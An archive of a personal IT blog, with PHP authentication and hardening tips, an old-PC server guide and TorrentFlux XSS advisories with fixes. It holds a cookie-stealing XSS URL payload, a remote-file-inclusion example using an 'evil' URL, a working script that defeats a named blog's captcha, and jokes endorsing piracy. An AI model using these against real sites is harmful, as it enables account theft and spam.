Archive for IT

HTTP Authentication with PHP running as CGI

While developing a project using two factor authentication with a key fob, I needed to use HTTP Basic Authentication over SSL to prevent XSS, as the project was a web based proxy. Now I had PHP5 running as a module, but PHP4 as CGI. There was the problem: HTTP Authentication isn’t available under PHP running as CGI.

First you need to configure mod_rewrite:

.htaccess:

RewriteEngine on
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]

What that does is copy the request’s Authorization header (the word “Basic” followed by the base64’d user:pass) into an environment variable named HTTP_AUTHORIZATION, which is why the code below skips the first 6 characters.

Then just add this above your script:

list($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']) = explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)), 2);

That splits up the username and password, and makes it look as if you were running PHP as a module.
So for a sample script:

<?php
// split the user/pass parts, but only if the browser actually sent Basic credentials
// (otherwise PHP_AUTH_USER would be set to '' and the prompt below would never appear)
if (isset($_SERVER['HTTP_AUTHORIZATION']) && strncasecmp($_SERVER['HTTP_AUTHORIZATION'], 'Basic ', 6) === 0) {
    // limit of 2: only the first ':' separates the user from the password
    $parts = explode(':', base64_decode(substr($_SERVER['HTTP_AUTHORIZATION'], 6)), 2);
    if (count($parts) === 2) {
        list($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']) = $parts;
    }
}

// open a user/pass prompt
if (!isset($_SERVER['PHP_AUTH_USER'])) {
    header('WWW-Authenticate: Basic realm="My Realm"');
    header('HTTP/1.0 401 Unauthorized');
    echo 'Text to send if user hits Cancel button';
    exit;
} else {
    echo 'Hello, '.htmlentities($_SERVER['PHP_AUTH_USER']).PHP_EOL;
    echo 'You entered as your password: '.htmlentities($_SERVER['PHP_AUTH_PW']).PHP_EOL;
}
?>
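As an added example (not code from the original post), here is the same header parsing pulled into a reusable function that covers what the one-liner does not: a missing header, a non-Basic scheme, invalid base64 and a password that itself contains a colon. It then checks the credentials against a hashed password. The user table is constructed for the example, and password_hash()/password_verify() assume PHP 5.5 or later rather than the PHP4 CGI setup of the post.

```php
<?php
// Added example, not from the original post: parse the HTTP_AUTHORIZATION
// value that the mod_rewrite rule exposes, then verify against a hash.

// Returns array(user, password) or null when no usable Basic credentials were sent.
function parseBasicAuthorization($header)
{
    if (!is_string($header) || strncasecmp($header, 'Basic ', 6) !== 0) {
        return null;                       // nothing sent, or a different scheme (e.g. Digest)
    }
    $decoded = base64_decode(trim(substr($header, 6)), true);   // strict: reject junk
    if ($decoded === false || strpos($decoded, ':') === false) {
        return null;
    }
    // limit 2: only the first ':' separates user and password, the password may contain more
    list($user, $pass) = explode(':', $decoded, 2);
    return array($user, $pass);
}

// Constructed user table (assumption for the example): store hashes, never plaintext.
// The hash is generated at runtime so the example is self-contained.
function exampleUsers()
{
    static $users = null;
    if ($users === null) {
        $users = array('alice' => password_hash('correct horse', PASSWORD_DEFAULT));
    }
    return $users;
}

// Returns the authenticated username or null.
function authenticate($header)
{
    $creds = parseBasicAuthorization($header);
    if ($creds === null) {
        return null;
    }
    list($user, $pass) = $creds;
    $users = exampleUsers();
    // Verify against a dummy hash when the user is unknown, so response time
    // does not reveal which usernames exist.
    $hash = isset($users[$user]) ? $users[$user] : password_hash('dummy', PASSWORD_DEFAULT);
    return (password_verify($pass, $hash) && isset($users[$user])) ? $user : null;
}

// Populate the same $_SERVER keys the module SAPI would, so the rest of a
// script written for mod_php can stay unchanged.
function populateServerAuthVars()
{
    $header = isset($_SERVER['HTTP_AUTHORIZATION']) ? $_SERVER['HTTP_AUTHORIZATION'] : null;
    $creds = parseBasicAuthorization($header);
    if ($creds !== null) {
        $_SERVER['PHP_AUTH_USER'] = $creds[0];
        $_SERVER['PHP_AUTH_PW'] = $creds[1];
    }
}

// Offline demonstration with constructed headers (run from the CLI).
if (PHP_SAPI === 'cli') {
    $good  = 'Basic ' . base64_encode('alice:correct horse');
    $colon = 'Basic ' . base64_encode('alice:pass:with:colons');
    var_dump(parseBasicAuthorization($colon));        // array('alice', 'pass:with:colons')
    var_dump(parseBasicAuthorization('Digest xyz'));  // NULL
    var_dump(parseBasicAuthorization('Basic !!!'));   // NULL (strict base64 rejects it)
    var_dump(authenticate($good));                    // string 'alice'
    var_dump(authenticate('Basic ' . base64_encode('alice:wrong'))); // NULL
}
```

Call populateServerAuthVars() at the top of the script in place of the one-liner; because the split is skipped when no valid header arrived, the isset() check that opens the browser prompt keeps working.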

Steven

The Easy Way to Turn That Old PC Into Something Useful! (Part 2)

This is the easiest part:

Windows:

Install Peer Guardian and utorrent

Download your hopefully legal content!

Linux:

Download: XAMPP

Install, this is a very easy installation!

Enjoy your webserver/fileserver!

Regards,

Steven Roddis

The Easy Way to Turn That Old PC Into Something Useful! (Part 1)

Ok, you have an old computer that you will never use as your main pc, however you would either:

  • Like to share files around the home.
  • Use it to illegally legally download music/movies/tv shows overnight. (To help save your peak dl’s)
  • Turn it into a webserver
  • Your introduction to another OS eg. linux.
  • Something else deconstructive. (Like world domination making peace)

So let’s start with the OS (Operating System):

Windows or Linux?

If you want to do file sharing or run a webserver: Linux

Downloading Stuff: Windows

Hang on a sec, Windows??? on an old PC. Oh.. yeah we can use something like 98?
No… Windows XP pro on an old pc, it can be done!
My choice of Windows was because Peer Guardian and utorrent run on it. (For “borrowing” music, games, tv shows, you name it.)

Installing the OS:

  • Windows:

Get a copy of windows 98+ (utorrent works on 95 but PG doesn’t and our next program doesn’t support NT or 95 either)

Installing windows is easy, with XP you just pop in the disc, and follow the steps.

Or you could look at some of these guides if you are really stuck:

Note for this example I am using Windows XP Pro:

So what is all this fuss about putting windows [running fast] on an old pc?

The Software from LitePC makes it possible. Get the version for your OS.

Yes, you could get it illegally, but they do a damn good job, so I would pay for it. (There is a FREE version)

If you need help, again you can drop me a line, or look at the knowledge base.

Now you have a fast windows based pc, and you are ready for the next step. :)

  • Linux:

Step 1: Find a Linux Distro…

I love easy to install, easy to use (and fast): ubuntu would be your best bet.

How can I get ubuntu?

Download and Burn it:

http://www.ubuntu.com/download

Get it shipped to you for FREE:

https://shipit.ubuntu.com

How do I install it?

  • A very easy install: make sure your BIOS is set to boot off CD, then pop the cd in. When it says boot: on the screen and an ubuntu logo appears, type server, and the install starts. Just follow the easy prompts, and when it asks you to erase the disc select the option that is automatically selected. It is a very simple task! :)

Configure Remote Access:

Linux (Ubuntu):

First we need to enable the root user:

So login and type:

sudo passwd root
su

(You now use that account, so type exit to logout and then log back in again as root.)

Type:

apt-get update
apt-get install ssh openssh-server

Beautiful!!!

Now to access it we need an SSH Client.

Windows:

Putty (You just need Putty)

Mac OS:

MacSSH

If you are using Linux (as a client) you can install ssh (In ubuntu: apt-get install ssh)

Putty is very easy to use: ie. just type in the IP Address of the computer, and all good.

How to find the IP Address:

ifconfig (it is ipconfig for windows)

Will tell you all that you need to know! :)

Windows:

You have two choices here if you are using XP Pro or 2000:

Remote Desktop (RDP)

Or VNC

My Favourite VNC Server: TightVNC (Did I mention the price?? Free!)

If you don’t have either XP Pro or 2000 then you will have to use VNC.

Part two is coming soon!

TorrentFlux “action” Script Insertion

TITLE:
TorrentFlux “action” Script Insertion

CRITICAL:
Not Critical

IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Input passed to the “action” variable is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an administrator’s browser session in the context of an affected site when the “Activity Log” is viewed.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised.

/admin.php

Line 336:

$output .= "<td><div class=\"tiny\">".htmlentities($action, ENT_QUOTES)."</div></td>";

Line 398:

echo "<option value=\"".htmlentities($action, ENT_QUOTES)."\" ".$selected.">".htmlentities($action, ENT_QUOTES)."</option>";

TorrentFlux “file” Script Insertion

TITLE:
TorrentFlux “file” Script Insertion

CRITICAL:
Moderate

IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Input passed to the “file” variable is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an administrator’s browser session in the context of an affected site when the “Activity Log” is viewed. An example is attempting to login with an incorrect username or password, where the username field of /login.php contains the arbitrary code.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised.

/admin.php

Line 338:

$output .= htmlentities($file, ENT_QUOTES);

TorrentFlux “user_id” Script Insertion

TITLE:
TorrentFlux “user_id” Script Insertion

CRITICAL:
Not Critical

IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Data passed to the “users” array is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in an administrator’s browser session in the context of an affected site when the “Activity Log” is viewed.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised.

/admin.php

Line 416:

echo "".htmlentities($users[$inx], ENT_QUOTES)."";

TorrentFlux “startpop.php” “torrent” Script Insertion

TITLE:
TorrentFlux “startpop.php” “torrent” Script Insertion

CRITICAL:
Not Critical

IMPACT:
Cross Site Scripting

WHERE:
From remote

SOFTWARE:
TorrentFlux 2.x

DESCRIPTION:
I have discovered a vulnerability in TorrentFlux, which can be exploited by malicious users to conduct script insertion attacks.

Input passed to the “torrent” field of a GET Request (/startpop.php?torrent=%22%3E%3Cscript%3Ealert(document.cookies);%3C/script%3E.torrent) is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user’s browser session in the context of an affected site if the user clicks on a malicious link.

The vulnerability has been confirmed in version 2.1. Other versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly sanitised.

/startpop.php

Line 36: Change to: $displayName = htmlentities($displayName, ENT_QUOTES);

(Line 36 is normally empty)

Grant only trusted users access to the application
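The fix in all four advisories above is the same one: encode every attacker-influenced value with htmlentities(..., ENT_QUOTES) before it reaches the Activity Log page. The following is an added example, not TorrentFlux’s own code, that applies that rule to a whole log row and to the action filter’s &lt;option&gt; element, so the difference between text context and attribute context is visible. The log entry, the field names and the illustrative unencoded rendering are constructed for the example; the h() helper and the explicit UTF-8 charset are additions beyond the patched lines.

```php
<?php
// Added example, not TorrentFlux code: output encoding for an Activity Log row.

// One place for the encoding rule: ENT_QUOTES so both " and ' are encoded
// (the value also lands inside an attribute, as on the <option> line), and an
// explicit charset so multibyte input cannot confuse the encoder.
function h($value)
{
    return htmlentities((string) $value, ENT_QUOTES, 'UTF-8');
}

// Constructed log entry: the three fields the advisories name (user, action,
// file), each carrying a script-insertion attempt.
function sampleLogEntry()
{
    return array(
        'user_id' => '<script>alert(1)</script>',
        'action'  => '" onmouseover="alert(2)',
        'file'    => '<img src=x onerror=alert(3)>',
    );
}

// Illustrative unencoded rendering (constructed, not the real admin.php):
// raw concatenation lets the markup in the fields become live.
function renderRowUnsafe(array $row)
{
    return '<tr><td>' . $row['user_id'] . '</td>'
         . '<td><div class="tiny">' . $row['action'] . '</div></td>'
         . '<td>' . $row['file'] . '</td></tr>';
}

// Encoded rendering: every field goes through h(), whatever its context.
function renderRowSafe(array $row)
{
    return '<tr><td>' . h($row['user_id']) . '</td>'
         . '<td><div class="tiny">' . h($row['action']) . '</div></td>'
         . '<td>' . h($row['file']) . '</td></tr>';
}

// The action filter <select> (admin.php line 398 in the first advisory) needs
// the value encoded twice: inside the value="" attribute and as the option text.
function renderActionOption($action, $selectedAction)
{
    $selected = ($action === $selectedAction) ? ' selected' : '';
    return '<option value="' . h($action) . '"' . $selected . '>' . h($action) . '</option>';
}

// Returns true when no raw '<' or '"' from the untrusted fields survives.
function rowIsEncoded(array $row)
{
    $html = renderRowSafe($row);
    return strpos($html, '<script') === false
        && strpos($html, 'onmouseover="') === false
        && strpos($html, '<img') === false;
}

if (PHP_SAPI === 'cli') {
    $row = sampleLogEntry();
    echo renderRowUnsafe($row), "\n";   // <script>, onmouseover, onerror are all live
    echo renderRowSafe($row), "\n";     // &lt;script&gt;..., &quot; onmouseover=&quot;...
    echo renderActionOption($row['action'], 'start'), "\n";
    var_dump(rowIsEncoded($row));       // bool(true)
}
```

Routing every value through one helper is what makes the fix auditable: a grep for echo or .= lines that do not call h() finds the remaining unencoded outputs, which is how the three separate admin.php lines above would have been caught together.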

Breaking Text Based Captcha is Easy!

Today, I still don’t remember how I got to this blog post, but anyway I saw that they had a text based captcha.

The blog author claims that it prevents spam, which it does! Because it added an extra layer of uniqueness to his code and unintelligent spam bots don’t realise. Anyway, now for the breaking:

<?php
// Break Text Based Captcha:
// match "<number> <operator> <number> =" as it appears in the page markup
$regex = '#/>\s+(\d+)\s*([\+\-\/\*])\s*(\d+)\s*\=?\s+#';
$page = getpage('http://pooteeweet.org/blog/259/p/1'); // getpage() is my own curl helper, see the note below

if (!preg_match($regex, $page, $matches)) {
    die('No captcha found');
}
$n1 = intval($matches[1]);
$n2 = intval($matches[3]);

$op = $matches[2];

switch ($op) {
    case '+':
        $INTresult = intval($n1+$n2);
        break;

    case '-':
        $INTresult = intval($n1-$n2);
        break;

    case '/':
        $INTresult = intval($n1/$n2);
        break;

    case '*':
        $INTresult = intval($n1*$n2);
        break;

    default:
        die('Illegal Operation');
        break;
}

echo $INTresult;
?>

Note that my framework has a function getpage which is just a simple (well, quite advanced actually…) curl function.

There you have it: $INTresult is the answer to the math problem.

Yes, this is a very simple text captcha, but breaking a more advanced one wouldn’t require that much more effort.

Regards,

Steven Roddis

2 Easy Steps to Increase Security in PHP

I get a lot of questions regarding how to increase security in a PHP App.

Aside from the obvious (write secure code), there are two easy “switches that you can flick”.

Disable: URL fopen wrappers

This will prevent most exploitations of the classic File Inclusion Vulnerability.

eg. include($foo.'bar.php');

Now if $foo is set to 'http://www.stevenroddis.com/evil?'

The script grabs PHP code from “http://www.stevenroddis.com/evil?bar.php”

But if URL fopen wrappers are off, then the hacker can only use files on your server. (Still with limitations such as the appended string)

However there is a downside to this: some applications may use URL wrappers to download data off the web. You can work around it by using curl, but you might not want to.
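The include() shape described above, beside a version that does not rely on allow_url_fopen being off, as an added example that is not from the original post. The hardened version takes a page key from the request and maps it to a file through a fixed table, so neither URL wrappers nor other files on the server can be reached, and the php.ini switch becomes defence in depth. The page map, the file names, the base directory and the http_response_code() call (PHP 5.4 or later) are assumptions for the example.

```php
<?php
// Added example, not from the original post: request-controlled include()
// next to an allowlist-based replacement.

// Shape the post warns about (do not use): $foo comes from the request, so
// with URL wrappers on it can name a remote host, and with them off it can
// still name other files on the server.
function includePageUnsafe($foo)
{
    include($foo . 'bar.php');
}

// Hardened: the request supplies a key, never a path. Only values present in
// the fixed map are ever handed to include().
function resolvePage($requestedKey, array $pages)
{
    if (!is_string($requestedKey)) {
        return null;                       // arrays/null from the query string are rejected
    }
    return isset($pages[$requestedKey]) ? $pages[$requestedKey] : null;
}

function includePageSafe($requestedKey, array $pages, $baseDir)
{
    $file = resolvePage($requestedKey, $pages);
    if ($file === null) {
        http_response_code(404);
        return false;
    }
    // Anchor the include to one local directory (assumed layout).
    $path = rtrim($baseDir, '/') . '/' . $file;
    if (!is_file($path)) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

// Constructed map of allowed pages: keys are what may appear in the URL.
function pageMap()
{
    return array(
        'home'    => 'home.php',
        'contact' => 'contact.php',
    );
}

if (PHP_SAPI === 'cli') {
    var_dump(resolvePage('home', pageMap()));                              // string 'home.php'
    var_dump(resolvePage('http://www.stevenroddis.com/evil?', pageMap())); // NULL
    var_dump(resolvePage('../config', pageMap()));                         // NULL (constructed traversal-shaped key)
    var_dump(resolvePage(array('home'), pageMap()));                       // NULL
}
```

In a real entry point the call would be includePageSafe(isset($_GET['page']) ? $_GET['page'] : null, pageMap(), __DIR__ . '/pages'); the lookup decides what is included, and the request never contributes a path component.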

How?

php.ini (most people won’t have access to this)

allow_url_fopen = off

.htaccess

php_flag allow_url_fopen off

Turn Off: Register Globals

Yes, it is off by default, but the number of sites that get hacked due to it being on is astounding. Register Globals is not needed in 99.99% of PHP apps.

How?

php.ini (most people won’t have access to this)

register_globals = off

.htaccess

php_flag register_globals off

#3 Bonus: Turn off Error Reporting

A lot of sites display sensitive information, which can make it easier to find a security hole and/or exploit it.

How?

php.ini (most people won’t have access to this)

display_errors = Off

.htaccess

php_flag display_errors Off

Enforce these in your web app:

Don’t let stupid configuration changes bring down your defences: inside your php application make sure you die() and give some [nice] error when, say, register globals is turned back on.

Code:

if (@ini_get('register_globals'))
{
    die();
}

You might want to do it also for allow_url_fopen (replace “register_globals” in the above with “allow_url_fopen”).
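A fuller version of that guard, as an added example rather than the post’s code: it checks all three settings at once, normalises what ini_get() returns (strings such as "1", "0" or "", and false for a directive that no longer exists, as register_globals does not since PHP 5.4), reports every violation together, and keeps the message shown to the visitor generic so the guard itself does not leak configuration. The directive list, the 503 response and the use of http_response_code() (PHP 5.4 or later) are assumptions for the example.

```php
<?php
// Added example, not from the original post: a startup guard for php.ini settings.

// Required state of each directive: true = must be on, false = must be off.
function requiredIniSettings()
{
    return array(
        'register_globals' => false,
        'allow_url_fopen'  => false,
        'display_errors'   => false,
    );
}

// Normalise whatever ini_get() hands back to a bool. An unknown directive
// (ini_get() === false) is treated as "off", the safe reading for settings
// that are required to be off. A value filter_var() does not recognise
// (display_errors can be "stderr") counts as "on" if it is non-empty.
function iniBool($name)
{
    $raw = ini_get($name);
    if ($raw === false) {
        return false;
    }
    $parsed = filter_var($raw, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
    return ($parsed === null) ? ($raw !== '') : $parsed;
}

// Returns the directive names whose current value violates the required
// state; an empty array means the configuration is acceptable.
function iniViolations(array $required)
{
    $bad = array();
    foreach ($required as $name => $mustBeOn) {
        if (iniBool($name) !== $mustBeOn) {
            $bad[] = $name;
        }
    }
    return $bad;
}

// Call at the very top of the application's entry point. Details go to the
// error log; the visitor only sees a generic message.
function enforceIni(array $required)
{
    $bad = iniViolations($required);
    if ($bad !== array()) {
        error_log('refusing to start, unsafe php.ini settings: ' . implode(', ', $bad));
        http_response_code(503);
        die('Service temporarily unavailable.');
    }
}

if (PHP_SAPI === 'cli') {
    // Show the check without killing the process: display_errors is usually
    // on for the CLI, so it normally appears in this list.
    var_dump(iniViolations(requiredIniSettings()));
    // Flip it at runtime (possible because display_errors is PHP_INI_ALL)
    // and confirm the violation clears.
    ini_set('display_errors', '0');
    var_dump(iniViolations(array('display_errors' => false)));   // array(0) {}
}
```

enforceIni(requiredIniSettings()) is the one line the application calls; because it runs before any request handling, a hosting-side change to php.ini or .htaccess is caught on the first request rather than discovered after an incident.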

There you have it: two (well, four) easy and simple steps to greatly increase security in your PHP application. (Three of them don’t require changing your code)

Regards,

Steven Roddis

/bin/rm: Argument list too long.

After forgetting to add “2>&1” to the end of my cron job that runs every minute, I ended up with a lot of “mail” in my Maildir, about 600,000! So I thought that I could do a simple “rm 11*” (each file started with 11).

But I ran into a problem: “Argument list too long.”

So after researching this problem I found out why (it has to do with not being able to fit the supplied argument list and environment into the 128K buffer).

I also found a solution: find . -name '11*' | xargs rm

Three minutes later my Maildir was clear!

Regards,

Steven Roddis
